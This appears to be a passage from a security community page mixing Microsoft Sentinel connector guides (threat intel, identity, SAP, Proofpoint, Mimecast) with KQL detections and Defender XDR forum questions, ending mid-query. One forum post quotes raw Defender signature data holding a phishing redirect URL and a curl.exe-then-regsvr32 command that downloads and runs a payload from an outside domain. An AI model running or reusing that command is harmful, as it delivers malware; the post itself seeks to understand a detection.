- Data Ingestion Costs: Every log and TI indicator ingested into Sentinel is billable by the GB. Bulk TI indicator ingestion (like GreyNoise pulling thousands of IPs/day) can add storage costs. Use Sentinel’s Data Collection Rules (DCR) to apply ingestion-time filters (e.g. only store indicators above a confidence threshold) to reduce volume. The GreyNoise feed is typically modest (since it’s daily, maybe thousands of IPs). Identity log volume (OneLogin/PingOne) depends on org size – it could be megabytes per day. Use Sentinel ingestion-time transformations or analytics-tier filters to drop low-value logs.
- Query Performance: Custom log tables (OneLogin, PingOne, KeeperLogs_CL) can grow large. Periodically archive old data (e.g. export >90 days to storage, then purge). Use materialized views or scheduled summary tables for heavy queries (e.g. pre-aggregate hourly login counts). For threat indicator tables, leverage built-in indices on IndicatorId and NetworkIP for fast joins. Use project-away to drop unneeded metadata columns from large join queries.
- Retention & Storage: Configure retention per table. If historical TI is less needed, set shorter retention. Use Azure Monitor’s tiering/Archive for seldom-used data. For large TI volumes (e.g. feeding multiple TIPs), consider using Sentinel Data Lake (or connecting Log Analytics to ADLS Gen2) to offload raw ingest cheaply.
- Scale-Out Architecture: For very large environments, use multiple Sentinel workspaces (e.g. regional) and aggregate logs via Azure Lighthouse or Sentinel Fusion. TI feeds can be shared: one workspace collects TI, then distributes to others via Sentinel’s TI management (feeds can be published and shared cross-workspace).
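As a rough planning aid for the ingestion-cost point above, billable volume scales linearly with event rate and size. A trivial estimator sketch; the per-GB price is deliberately an input parameter, since actual Sentinel/Log Analytics rates vary by region and tier and are not hardcoded here:

```python
def monthly_ingest_gb(events_per_day: float, avg_event_bytes: float, days: int = 30) -> float:
    """Approximate billable ingestion volume in GB over a month."""
    return events_per_day * avg_event_bytes * days / (1024 ** 3)

def monthly_cost(events_per_day: float, avg_event_bytes: float, price_per_gb: float) -> float:
    """Multiply estimated volume by your current per-GB rate (look it up; it varies)."""
    return monthly_ingest_gb(events_per_day, avg_event_bytes) * price_per_gb
```

For example, one million ~1 KB identity events per day works out to roughly 28.6 GB per month, which is the kind of number to sanity-check before enabling a verbose connector.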
- Connector Limits: API rate limits dictate update frequency. Schedule connectors accordingly (e.g. daily for TI, hourly for identity events). Avoid hourly pulls of essentially static data (a users list can be refreshed daily). For OneLogin/PingOne, use incremental tokens or webhooks if possible to reduce load.
- Monitoring Health: Use Sentinel’s Log Analytics and Azure Monitor metrics to track ingestion volume and connector errors. For example, monitor the Functions running GreyNoise/Scout for failures or throttling.
Deployment Checklist & Guide
Prepare Sentinel Workspace: Ensure a Log Analytics workspace with Sentinel enabled. Record the workspace ID and region.
Register Applications: In Azure AD, create and note any service principal needed for functions or connectors (e.g. a Sentinel-managed identity for Functions). In each vendor portal, register API apps and credentials (OneLogin OIDC app, PingOne API client, Keeper AD app).
Network & Security: If needed, configure firewall rules to allow outbound access to vendor APIs.
Install Connectors: In the Sentinel Content Hub or Marketplace, install the solutions for GreyNoise TI, Team Cymru Scout, OneLogin IAM, and PingOne. Follow each wizard to input credentials. Verify the “Data Types” (Logs, Alerts, etc.) are enabled.
Create Tables & Parsers (if manual): For Keeper or unsupported logs, manually create custom tables (via DCR in the Azure portal). Import JSON to define fields as shown in Keeper’s docs.
Test Data Flow: After each setup, wait 1–24 hours and run a simple query on the destination table (e.g. OneLoginEventsV2_CL | take 5) to confirm ingestion.
Deploy Ingestion Rules: Use Sentinel threat intelligence ingestion rules to fine-tune feeds (e.g. mark high-confidence feeds to extend expiration). Optionally tag/allowlist known-good indicators.
Configure Analytics: Enable or create rules using the KQL above. Place them in the correct threat hunting or incident rule categories (Credential Access, Lateral Movement, etc.). Assign appropriate alert severity.
Set up Playbooks: For automated actions (alert enrichment, IOC blocking), create Logic App playbooks. Test with mock alerts (dry run) to ensure correct API calls.
Tuning & Baseline: After initial alerts, tune queries (thresholds, whitelists) to reduce noise. Maintain suppression lists (e.g. internal pentest IPs). Use the MITRE mapping in rule details for clarity.
Documentation & Training: Document field mappings (e.g. OneLoginEvents fields), and train SOC staff on new TI-enriched alert fields.
Connectors Comparison
GreyNoise — Data sources: IP intelligence (scanners). Sentinel tables: ThreatIntelligenceIndicator. Update frequency: daily (scheduled pull). Auth method: API key. Key fields enriched: IP classification, noise status. Limits/cost: API key required; paid license for large usage. Pros: filters benign scans, broad scan visibility. Cons: IP-based only (no domain/file indicators).
Team Cymru Scout — Data sources: global IP/domain telemetry. Sentinel tables: Cymru_Scout_*_CL (custom tables). Update frequency: on-demand or daily. Auth method: account credentials. Key fields enriched: detailed IP/domain context (ports, PDNS, ASN, etc.). Limits/cost: requires a Team Cymru subscription; potentially high feed cost. Pros: rich context (open ports, DNS, certs); great for IOC enrichment. Cons: complex setup; data lands in custom tables only.
OneLogin IAM — Data sources: OneLogin user/auth logs. Sentinel tables: OneLoginEventsV2_CL, OneLoginUsersV2_CL. Update frequency: polls hourly. Auth method: OAuth2 (client ID/secret). Key fields enriched: user, app, IP, event type (login, MFA, etc.). Limits/cost: OneLogin API allows 5K calls/hour; moderate data volume. Pros: direct insight into cloud identity use; built-in parser available. Cons: limited to the OneLogin environment only.
PingOne Audit — Data sources: PingOne audit logs. Sentinel tables: PingOne_AuditActivitiesV2_CL. Update frequency: polls hourly. Auth method: OAuth2 (client ID/secret). Key fields enriched: user actions, admin events, MFA logs. Limits/cost: rate limited by Ping license; moderate data volume. Pros: captures critical identity events; widely used product. Cons: requires a PingOne Advanced license for audit logs.
Keeper (custom) — Data sources: Keeper security events. Sentinel tables: KeeperLogs_CL (custom). Update frequency: push (continuous). Auth method: OAuth2 (client ID/secret) + Azure DCR. Key fields enriched: vault logins, record accesses, admin changes. Limits/cost: none (push model); storage costs apply. Pros: visibility into password vault activity (often a blind spot). Cons: more manual setup; custom logs not parsed by default.
Data Flow Diagram
This flowchart shows GreyNoise (GN) feeding the Threat Intelligence table, Team Cymru feeding enrichment tables, and identity sources pushing logs. All data converges into Sentinel, where enrichment lookups inform analytics and automated responses.

Observed Automation Discrepancies
Hi Team ... I want to know the logic behind the Defender XDR automation engine. How does it work? I have observed Defender XDR automation engine behavior contrary to expectations: despite expecting identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Our own automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent. A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. The automation was not triggered by our own rules but by Microsoft's Defender XDR, and we are seeking clarification on the underlying logic.

SAP & Business-Critical App Security Connectors
I validated what it takes to make SAP and SAP-adjacent security signals operational in a SOC: reliable ingestion, stable schemas, and detections that survive latency and schema drift. I focus on four integrations into Microsoft Sentinel: SAP Enterprise Threat Detection (ETD) cloud edition (SAPETDAlerts_CL, SAPETDInvestigations_CL), SAP S/4HANA Cloud Public Edition agentless audit ingestion (ABAPAuditLog), Onapsis Defend (Onapsis_Defend_CL), and SecurityBridge (also ABAPAuditLog). Because vendor API specifics for the ETD Retrieval API / Audit Retrieval API aren’t publicly detailed in the accessible primary sources I could retrieve, I explicitly label pagination/rate/time-window behaviors as unspecified where appropriate.
Connector architectures and deployment patterns
For SAP-centric telemetry I separate two planes. First is SAP application telemetry that lands in SAP-native tables, especially ABAPAuditLog, ABAPChangeDocsLog, ABAPUserDetails, and ABAPAuthorizationDetails. These tables are the foundation for ABAP-layer monitoring and are documented with typed columns in the Azure Monitor Logs reference. Second is external “security product” telemetry (ETD alerts, Onapsis findings). These land in custom tables (*_CL) and typically require a SOC-owned normalization layer to avoid brittle detections.
Within Microsoft’s SAP solution itself, there are two deployment models: agentless and containerized connector agent. The agentless connector uses SAP Cloud Connector and SAP Integration Suite to pull logs, and Microsoft documents it as the recommended approach; the containerized agent is being deprecated and will be disabled on September 14, 2026.
On the “implementation technology” axis, Sentinel integrations generally show up as:
- Codeless Connector Framework (CCF) pollers/pushers (SaaS-managed ingestion definitions with DCR support).
- Function/Logic App custom pipelines using the Logs Ingestion API when you need custom polling, enrichment, or a vendor endpoint that isn’t modeled in CCF.
In my view, ETD and S/4HANA Cloud connectors are “agentless” from the Sentinel side (API credentials only), while Onapsis Defend and SecurityBridge connectors behave like push pipelines because Microsoft requires an Entra app + DCR permissions (the typical Logs Ingestion API pattern).
Authentication and secrets handling
Microsoft documents the required credentials per connector:
- The ETD cloud connector requires Client Id + Client Secret for the ETD Retrieval API (token mechanics unspecified).
- The S/4HANA Cloud Public Edition connector requires Client Id + Client Secret for the Audit Retrieval API (token mechanics unspecified), and Microsoft notes “alternative authentication mechanisms” exist (details in the linked repo are unspecified in accessible sources).
- The Onapsis Defend and SecurityBridge connectors require a Microsoft Entra ID app registration and Azure permission to assign Monitoring Metrics Publisher on DCRs. This maps directly to the Logs Ingestion API guidance, where a service principal is granted DCR access via that role (or the Microsoft.Insights/Telemetry/Write data action).
For production, I treat these as “SOC platform secrets”:
- Store client secrets/certificates in Key Vault when you own the pipeline (Function/Logic App); rotate on an operational schedule; alert on auth failures and sudden ingestion drops.
- For vendor-managed ingestion (Onapsis/SecurityBridge), I still require: documented ownership of the Entra app, explicit RBAC scope for the DCR, and change control for credential rotation, because a rotated secret is effectively a data outage.
API behaviors and ingestion reliability
For the ETD Retrieval API and Audit Retrieval API, pagination/rate limits/time windows are unspecified in the accessible vendor documentation I could retrieve.
I therefore design ingestion and detections assuming non-ideal API behavior: late-arriving events, cursor/page limitations, and throttling. CCF’s RestApiPoller model supports explicit retry policy, windowing, and multiple paging strategies, so if/when you can obtain vendor API semantics, you can encode them declaratively (rather than writing fragile code). For the SAP solution’s telemetry plane, Microsoft provides strong operational cues: agentless collection flows through Integration Suite, and troubleshooting typically happens in the Integration Suite message log; this is where I validate delivery failures before debugging Sentinel-side parsers. For scheduled detections, I always account for ingestion delay explicitly. Microsoft’s guidance is to widen event lookback by expected delay and then constrain on ingestion_time() to prevent duplicates from overlap.
Schema, DCR transformations, and normalization layer
Connector attribute comparison
SAP ETD (cloud) — Auth method: Client ID + Secret (ETD Retrieval API). Sentinel tables: SAPETDAlerts_CL, SAPETDInvestigations_CL. Default polling: unspecified. Backfill: unspecified. Pagination: unspecified. Rate limits: unspecified.
SAP S/4HANA Cloud (agentless) — Auth method: Client ID + Secret (Audit Retrieval API); alternative auth referenced. Sentinel tables: ABAPAuditLog. Default polling: unspecified. Backfill: unspecified. Pagination: unspecified. Rate limits: unspecified.
Onapsis Defend — Auth method: Entra app + DCR permission (Monitoring Metrics Publisher). Sentinel tables: Onapsis_Defend_CL. Default polling: n/a (push pattern). Backfill: unspecified. Pagination: n/a. Rate limits: unspecified.
SecurityBridge — Auth method: Entra app + DCR permission (Monitoring Metrics Publisher). Sentinel tables: ABAPAuditLog. Default polling: n/a (push pattern). Backfill: unspecified. Pagination: n/a. Rate limits: unspecified.
Ingestion-time DCR transformations
Sentinel supports ingestion-time transformations through DCRs to filter, enrich, and mask data before it’s stored.
Example: I remove low-signal audit noise and mask email identifiers in ABAPAuditLog:
source
| where isnotempty(TransactionCode) and isnotempty(User)
| where TransactionCode !in ("SM21","ST22") // example noise; tune per tenant
| extend Email = iif(Email has "@", strcat(substring(Email,0,2), "***@", tostring(split(Email,"@")[1])), Email)
Normalization functions
Microsoft explicitly recommends using SAP solution functions instead of raw tables because they can change the infrastructure beneath without breaking detections. I follow the same pattern for ETD/Onapsis custom tables: I publish SOC-owned functions as a schema contract.
.create-or-alter function with (folder="SOC/SAP") Normalize_ABAPAudit() {
    ABAPAuditLog
    | project TimeGenerated, SystemId, ClientId, User, TransactionCode, TerminalIpV6, MessageId, MessageClass, MessageText, AlertSeverityText, UpdatedOn
}
.create-or-alter function with (folder="SOC/SAP") Normalize_ETDAlerts() {
    SAPETDAlerts_CL
    | extend AlertId = tostring(coalesce(column_ifexists("AlertId",""), column_ifexists("id",""))),
             Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))),
             SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("User",""), column_ifexists("user","")))
    | project TimeGenerated, AlertId, Severity, SapUser, *
}
.create-or-alter function with (folder="SOC/SAP") Normalize_Onapsis() {
    Onapsis_Defend_CL
    | extend FindingId = tostring(coalesce(column_ifexists("FindingId",""), column_ifexists("id",""))),
             Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))),
             SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("user","")))
    | project TimeGenerated, FindingId, Severity, SapUser, *
}
Health/lag monitoring and anti-gap
I monitor both connector health and ingestion delay. SentinelHealth is the native health table, and Microsoft provides a health workbook and a schema reference for the fields.
let lookback=24h;
union isfuzzy=true
    (ABAPAuditLog | extend T="ABAPAuditLog"),
    (SAPETDAlerts_CL | extend T="SAPETDAlerts_CL"),
    (Onapsis_Defend_CL | extend T="Onapsis_Defend_CL")
| where TimeGenerated > ago(lookback)
| summarize LastEvent=max(TimeGenerated),
            P95DelaySec=percentile(datetime_diff("second", ingestion_time(), TimeGenerated), 95),
            Events=count() by T
Anti-gap scheduled-rule frame (Microsoft pattern):
let ingestion_delay=10m;
let rule_lookback=5m;
ABAPAuditLog
| where TimeGenerated >= ago(ingestion_delay + rule_lookback)
| where ingestion_time() > ago(rule_lookback)
SOC detections for ABAP privilege abuse, fraud/insider behavior, and audit readiness
Privileged ABAP transaction monitoring
ABAPAuditLog includes TransactionCode, User, SystemId, and terminal/IP fields, so I start with a curated high-risk tcode set and then add baselines.
let PrivTCodes=dynamic(["SU01","PFCG","SM59","RZ10","SM49","SE37","SE16","SE16N"]);
Normalize_ABAPAudit()
| where TransactionCode in (PrivTCodes)
| summarize Actions=count(), Ips=make_set(TerminalIpV6,5) by SystemId, User, TransactionCode, bin(TimeGenerated, 1h)
| where Actions >= 3
Fraud/insider scenario: sensitive object change near privileged audit activity
ABAPChangeDocsLog exposes ObjectClass, ObjectId, and change types; I correlate sensitive object changes to privileged transactions in a tight window.
let w=10m;
let Sensitive=dynamic(["BELEG","BPAR","PFCG","IDENTITY"]);
ABAPChangeDocsLog
| where ObjectClass in (Sensitive)
| project ChangeTime=TimeGenerated, SystemId, User=tostring(column_ifexists("User","")), ObjectClass, ObjectId, TypeOfChange=tostring(column_ifexists("ItemTypeOfChange",""))
| join kind=innerunique (
    Normalize_ABAPAudit()
    | project AuditTime=TimeGenerated, SystemId, User, TransactionCode
) on SystemId, User
| where AuditTime between (ChangeTime-w .. ChangeTime+w)
| project ChangeTime, AuditTime, SystemId, User, ObjectClass, ObjectId, TransactionCode, TypeOfChange
Audit-ready pipeline: monitoring continuity and configuration touchpoints
I treat audit logging itself as a monitored control. A simple SOC-safe control is “volume drop” by system; it’s vendor-agnostic and catches pipeline breaks and deliberate suppression.
Normalize_ABAPAudit()
| summarize PerHour=count() by SystemId, bin(TimeGenerated, 1h)
| summarize Avg=avg(PerHour), arg_max(TimeGenerated, PerHour) by SystemId
| where PerHour < (Avg * 0.2)
Where Onapsis/ETD are present, I increase fidelity by requiring “privileged ABAP activity” plus an external SAP-security product finding (field mappings are tenant-specific; normalize first):
let win=1h;
Normalize_ABAPAudit()
| where TransactionCode in ("SU01","PFCG","SM59","SE16N")
| join kind=leftouter (Normalize_Onapsis()) on $left.User == $right.SapUser
| where isnotempty(FindingId) and TimeGenerated1 between (TimeGenerated .. TimeGenerated+win)
| project TimeGenerated, SystemId, User, TransactionCode, FindingId, OnapsisSeverity=Severity
Production validation, troubleshooting, and runbook
For acceptance, I validate in this order: table creation, freshness/lag percentiles, connector health state, and a cross-check of event counts against the upstream system for the same UTC window (where available). Connector health monitoring is built around SentinelHealth plus the Data collection health workbook. For SAP agentless ingestion, Microsoft states most troubleshooting happens in Integration Suite message logs—this is where I triage authentication/networking failures before tuning KQL. For Onapsis/SecurityBridge-style ingestion, I validate Entra app auth, DCR permission assignment (Monitoring Metrics Publisher), and a minimal ingestion test payload using the Logs Ingestion API tutorial flow.
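When validating a push pipeline with a minimal Logs Ingestion API test payload, larger uploads must be split into bounded JSON batches. A stdlib-only sketch of that batching step (the 1 MB ceiling is a placeholder — check current service limits; the authenticated upload itself, e.g. via the azure-monitor-ingestion client, is deliberately omitted):

```python
import json
from typing import Iterator, List

def batch_for_upload(records: List[dict], max_bytes: int = 1_000_000) -> Iterator[List[dict]]:
    """Group records into batches whose serialized JSON array stays under max_bytes.

    A single oversized record is emitted alone, so the service (not this code)
    decides whether to reject it.
    """
    batch: List[dict] = []
    size = 2  # account for the enclosing "[]"
    for rec in records:
        rec_size = len(json.dumps(rec)) + 1  # +1 for the separating comma
        if batch and size + rec_size > max_bytes:
            yield batch
            batch, size = [], 2
        batch.append(rec)
        size += rec_size
    if batch:
        yield batch
```

Each yielded batch would then be passed to the upload client in one call; keeping the batching pure makes it trivial to verify before any credentials are involved.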
Operational runbook items I treat as non-optional: health alerts on connector failure and freshness drift; scheduled-rule anti-gap logic; playbooks that capture evidence bundles (ABAPAuditLog slice + user context from ABAPUserDetails/ABAPAuthorizationDetails); DCR filters to reduce noise and cost; and change control for normalization functions and watchlists.
SOC “definition of done” checklist (short): 1) Tables present and steadily ingesting; 2) P95 ingestion delay measured and rules use the anti-gap pattern; 3) SentinelHealth enabled with alerts; 4) SOC-owned normalization functions deployed; 5) at least one privileged-tcode rule + one change-correlation rule + one audit-continuity rule in production.
Mermaid ingestion flow (diagram omitted).

XDR RBAC missing Endpoint & Vulnerability Management
I've been looking at ways to provide a user with access to the Vulnerability Dashboard and associated reports without giving them access to anything else within Defender (Email, Cloud App, etc.). Looking at the article https://learn.microsoft.com/en-us/defender-xdr/activate-defender-rbac, it has a slider for Endpoint Management which I don't appear to have. I have Business Premium licences which give me GA access to see the data, so I know I'm licensed for it and it works, but I can't figure out how to assign permissions. When looking at creating a custom permission here https://learn.microsoft.com/en-us/defender-xdr/custom-permissions-details#security-posture--posture-management it mentions Security Posture Management would give them Vulnerability Management Level Read, which is what I'm after, but that doesn't appear to be working. The test account I'm using to try this out just gets an error: "Error getting device data". I'm assuming it's because it doesn't have permissions to the device details?

Question malware autodelete
Malware like Trojan:Win32/Wacatac.C!ml can download other malware, and that second-stage malware can perform the malicious action and then delete itself. In the next scan by a free antivirus, will the malware that deleted itself leave no trace and go undetected by the scan?

Explorer permission to download an email
Global Admin is allegedly not sufficient access to download an email. So I have a user asking for a copy of her email, and I'm telling her "sorry, I don't have that permission, I'm only Global Admin." What? The documentation basically forces you to use the new terrible "role group" system. I see various roles that you need to add to a role group in order to do this. Some mention Preview, some mention Security Administrator, some mention Security Operator. I've asked Copilot 100 different times, and it keeps giving me made-up roles, then linking to the made-up role. How is such basic functionality broken? It makes zero sense. I don't want to submit this email - it's not malware or anything. I just want to download the **bleep** thing, and I don't want to have to go through the whole poorview process. This is really basic stuff. I can do this on about 10% of my GA accounts. There's no difference in the permissions - it just seems inconsistent.

NetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek. I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.

Security Admin role replacement with Defender XDR
We currently have the Security Administrator role assigned to multiple users in our organization. We are considering replacing it with custom RBAC roles in Microsoft Defender XDR as described in https://learn.microsoft.com/en-us/defender-xdr/custom-roles Our goal is to provide these users full access to the Microsoft Defender security portal so they can respond to alerts and manage security operations. They do not require access to the Entra ID portal for tasks such as managing conditional access policies or authentication method policies. Can we completely remove the Security Administrator role and rely solely on the custom RBAC role in Defender XDR to meet these requirements?

Where can I get the latest info on Advanced Hunting Table Retirement
First question - where can I find the latest info on the deprecation of advanced hunting tables? Background - I was developing some detections and, as I was trying to decide which table I should use, I opened up the docs containing the schema for the `EntraIdSignInEvents` table (https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-entraidsigninevents-table) and was met by two ambiguous banners stating: "On December 9, 2025, the EntraIdSignInEvents table will replace AADSignInEventsBeta. This change will be made to remove the latter's preview status and to align it with the existing product branding. Both tables will coexist until AADSignInEventsBeta is deprecated after the said date. To ensure a smooth transition, make sure that you update your queries that use the AADSignInEventsBeta table to use EntraIdSignInEvents before the previously mentioned date. Your custom detections will be updated automatically and won't require any changes." "Some information relates to prereleased product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here. Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table." This made me very confused as I still have data from AADSignInEventsBeta on my tenant from today. I'm not sure what this means and I'm hoping to get some clear info on table retirement.

Invalidating kerberos tickets via XDR?
Since we have alerts every now and then regarding suspected Pass-the-Ticket incidents, I want to know if there's a way to make a user's Kerberos ticket invalid. Like the "Revoke Session" option in Entra ID, is there anything similar that we can do in XDR?

Integrating Proofpoint and Mimecast Email Security with Microsoft Sentinel
Microsoft Sentinel can ingest rich email security telemetry from Proofpoint and Mimecast to power advanced phishing detection. The Proofpoint On Demand (POD) Email Security and Proofpoint Targeted Attack Protection (TAP) connectors pull threat logs (quarantines, spam, phishing attempts) and user click data into Sentinel. Similarly, the Mimecast Secure Email Gateway connector ingests detailed mail flow and targeted-threat logs (attachment/URL scans, impersonation events). These integrations use Azure-hosted ingestion (via Logic Apps or Azure Functions) and the new Codeless Connector framework to call vendor APIs on a schedule. The result is a consolidated dataset in Sentinel’s Log Analytics, enabling correlated alerting and hunting across email, identity, and endpoint signals.
Figure: Phishing emails are processed by Mimecast’s gateway and Proofpoint POD/TAP services. Security logs (delivery/quarantine events, malicious attachments/links, user clicks) flow into Microsoft Sentinel. In Sentinel, these mail signals are correlated with identity (Azure AD), endpoint (Defender) and network telemetry for end-to-end phishing detection.
Proofpoint POD (Email Protection) Connector
The Proofpoint POD connector ingests core email protection logs. It creates two tables, ProofpointPODMailLog_CL and ProofpointPODMessage_CL. These logs include per-message metadata (senders, recipients, subject, message size, timestamps), threat scores (spamScore, phishScore, malwareScore, impostorScore), and attachment details (number of attachments, names, hash values and sandbox verdicts). Quarantine actions are recorded (quarantine folder/rule), and malicious indicators (URL or file hash) and campaign IDs are tagged in the threatsInfoMap field. For example, each ProofpointPODMessage_CL record may carry a sender_s (sender email domain hashed), recipient list, subject, and any detected threat type (Phish/Malware/Spam/Impostor) with the associated threat hash or URL.
Deployment: Proofpoint POD uses Sentinel’s codeless connector (an Azure Function behind the scenes). You must provide Proofpoint API credentials (Cluster ID and API token) in the connector UI. The connector periodically calls the Proofpoint SIEM API to fetch new log events (typically in 1–2 hour batches). The data lands in the above tables. (Older custom Logic App approaches similarly parse JSON output from the /v2/siem/messages endpoints.)
Proofpoint TAP (Targeted Attack Protection) Connector
Proofpoint TAP provides user-click and message-delivery events. Its connector creates four tables: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, and ProofPointTAPClicksBlockedV2_CL. The message tables report emails with detected threats (URL or attachment defense) that were delivered or blocked by TAP. They include the same fields as POD (message GUID, sender, recipients, subject, threat campaign ID, scores, attachment info). The click tables log when users click on URLs: each record has the URL, click timestamp (clickTime), the user’s IP (clickIP), user agent, the message GUID, and the threat ID/category. These fields allow you to see who clicked which malicious link and when. As the connector description notes, these logs give “visibility into Message and Click events in Microsoft Sentinel” for hunting.
Deployment: The TAP connector also uses the codeless framework. You supply a TAP API service principal and secret (Proofpoint SIEM API credentials) in the Sentinel content connector. The function app calls TAP’s /v2/siem/clicks/blocked, /permitted, /messages/blocked, and /delivered endpoints. The Proofpoint SIEM API limits queries to 1-hour windows and 7-day history, with no paging (all events in the interval are returned). (A Logic App approach could also be used, as shown in the Tech Community blog: one HTTP GET per event type and a JSON Parse before sending to Log Analytics.)
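Given the 1-hour query window and 7-day history limits just described, any TAP backfill has to be chunked into compliant windows. A sketch of the window arithmetic (pure datetime math, no Proofpoint API calls; the constants mirror the limits stated above):

```python
from datetime import datetime, timedelta
from typing import Iterator, Tuple

MAX_WINDOW = timedelta(hours=1)   # per-call query window limit
MAX_HISTORY = timedelta(days=7)   # oldest data the API will return

def query_windows(start: datetime, end: datetime, now: datetime) -> Iterator[Tuple[datetime, datetime]]:
    """Yield (from, to) pairs covering [start, end], clamped to the retention
    horizon and never wider than the per-call window."""
    horizon = now - MAX_HISTORY
    cur = max(start, horizon)  # anything older than the horizon is unretrievable
    while cur < end:
        nxt = min(cur + MAX_WINDOW, end)
        yield (cur, nxt)
        cur = nxt
```

Each yielded pair maps to one call per endpoint (clicks/messages, blocked/permitted/delivered), which also gives you a natural unit for retry on throttling.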
Mimecast Secure Email Gateway Connector

The Mimecast connector ingests Secure Email Gateway (SEG) logs and targeted-threat (TTP) logs. Inbound, outbound and internal mail events from the Mimecast MTA (receipt, processing, delivery stages) are pulled via the API. Typical fields include the unique message ID (aCode), sender, recipient, subject, attachment count/names, and policy actions or holds (e.g. spam quarantine). For example, the Mimecast “Process” log shows AttCnt, AttNames, and whether the message was held (Hld) for review; delivery logs include success/failure and TLS details.

In addition, Mimecast TTP logs are collected. URL Protect logs (when a user clicks a blocked URL) include the clicked URL (url), category (urlCategory), sender/recipient, and block reason. Impersonation Protect logs capture spoofing detections (e.g. when an internal name is impersonated), with fields like Sender, Recipient, Definition and Action (hold/quarantine). Attachment Protect logs record malicious file detections (filename, hash, threat type).

Deployment: Like Proofpoint, Mimecast’s connector uses Azure Functions via the Sentinel content hub. You install the Mimecast solution, open the connector page, then enter Azure app credentials and Mimecast API keys (API Application ID/Key and Access/Secret for the service account). As shown in the deployment guide, you must provide the Azure Subscription, Resource Group, Log Analytics Workspace, and the Azure Client (App) ID, Tenant ID and Object ID of the admin performing the setup. On the Mimecast side, you supply the regional API Base URL, App ID/Secret and user Access/Secret. The connector creates a Function App that polls Mimecast’s SIEM APIs on a cron schedule (every 30 minutes by default). You can optionally specify a start date to backfill up to 7 days of logs. The default tables are MimecastSIEM_CL (email flow logs) and MimecastDLP_CL (DLP/TTP events), though custom names can be set.
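To sanity-check the TTP feed after deployment, a minimal query over the DLP/TTP table could pull recent URL Protect clicks. The column names here (url_s, urlCategory_s, recipient_s) are assumptions based on the fields described above and the usual _CL suffix convention; confirm them against your ingested schema.

```kql
// Sketch: recent URL Protect click events from the Mimecast TTP table.
// url_s / urlCategory_s / recipient_s are assumed column names.
MimecastDLP_CL
| where TimeGenerated > ago(24h)
| where isnotempty(url_s)
| project TimeGenerated, Recipient = recipient_s, URL = url_s, Category = urlCategory_s
| order by TimeGenerated desc
```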
Ingestion Considerations

Data Latency: All these connectors are pull-based and typically run on a schedule (often 30–60 minutes). For example, the Proofpoint POD docs note hourly log increments, and Mimecast logs are aggregated every 30 minutes. Expect a delay of up to an hour or more from event occurrence to Sentinel ingestion.

Schema Nuances: The APIs often return nested arrays and optional fields. For instance, the Proofpoint blog warns that some JSON fields can be null or vary in type, so the parse schema should account for all possibilities. Similarly, Mimecast logs come in pipe-delimited or JSON format, with values sometimes empty (e.g. no attachments). In KQL, use tostring() or parse_json() on the raw _CL columns, and mv-expand on any multivalue fields (like message parts or threat lists).

Table Names: Use the connector’s tables as listed. For Proofpoint POD: ProofpointPODMailLog_CL and ProofpointPODMessage_CL; for TAP: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, ProofPointTAPClicksBlockedV2_CL. For Mimecast SEG/TTP: MimecastSIEM_CL (SEG logs) and MimecastDLP_CL (TTP logs).

API Behavior: The Proofpoint TAP API has no paging. Be aware of time zones (Proofpoint uses UTC) and use the Sentinel ingestion TimeGenerated or event timestamp fields for binning.

Detection Engineering and Correlation

To detect phishing effectively, correlate these email logs with identity, endpoint and intel data:

Identity (Azure AD): Mail logs contain recipient addresses and (hashed) sender user parts. A common tactic is to correlate SMTP recipients or sender domains with Azure AD user records; for example, join TAP clicks by recipient to the user’s UPN. The Proofpoint logs also include the clicker’s IP (clickIP), which you can match to Azure AD sign-in logs or VPN logs to find which device/location clicked a malicious link.
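That clickIP pivot can be sketched as a join against the standard Entra ID SigninLogs table. The TAP column names (clickIP_s, recipient_s, url_s) are assumptions; adjust them to your workspace and widen or narrow the one-hour window as needed.

```kql
// Correlate permitted TAP clicks with sign-ins from the same IP within 1 hour.
// clickIP_s / recipient_s / url_s are assumed TAP column names;
// SigninLogs is the standard Entra ID sign-in table.
let clicks = ProofPointTAPClicksPermittedV2_CL
| where TimeGenerated > ago(24h)
| project ClickTime = TimeGenerated, Recipient = recipient_s,
          ClickIP = clickIP_s, URL = url_s;
clicks
| join kind=inner (
    SigninLogs
    | where TimeGenerated > ago(24h)
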